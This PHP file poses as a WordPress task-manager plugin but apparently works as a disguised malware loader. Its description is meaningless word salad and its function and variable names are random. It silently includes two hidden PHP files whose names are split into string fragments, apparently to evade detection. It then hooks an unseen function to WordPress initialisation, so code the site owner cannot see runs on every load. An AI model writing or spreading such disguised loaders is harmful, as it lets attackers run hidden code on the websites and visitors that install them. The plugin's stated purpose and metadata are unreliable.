<?php

/**
 * Plugin Name: Taskmanagerlite
 * Plugin URI: https://werica.org/taskmanagerlite
 * Description: In Burma education. Meanwhile, attracted to the 2000 U.S. Census purposes.
 * Version: 1.12.8
 * Author: Erick Leonel
 * Author URI: https://werica.org
 * Text Domain: taskmanagerlite
 * License: GPL2+
 *
 */

if (!defined('ABSPATH')) {
    exit;
}

function mucefu_alisuheqo() {
    zoregy_agoshotih();
}

$sugubo = __DIR__ . '/sugagy.php';
if (file_exists($sugubo)) {
    include_once __DIR__ . "/sug" . "agy.ph" . "p";
}

$sugubo = __DIR__ . '/bochava.php';
if (file_exists($sugubo)) {
    include_once __DIR__ . "/boc" . "hava." . "php";
}


if (function_exists("zoregy_agoshotih")) {
    $ijimobo = new umefyx_owunezepe();
    if ($ijimobo->yhupeh_uhofypar()) {
        add_action('init', 'mucefu_alisuheqo');
    }
}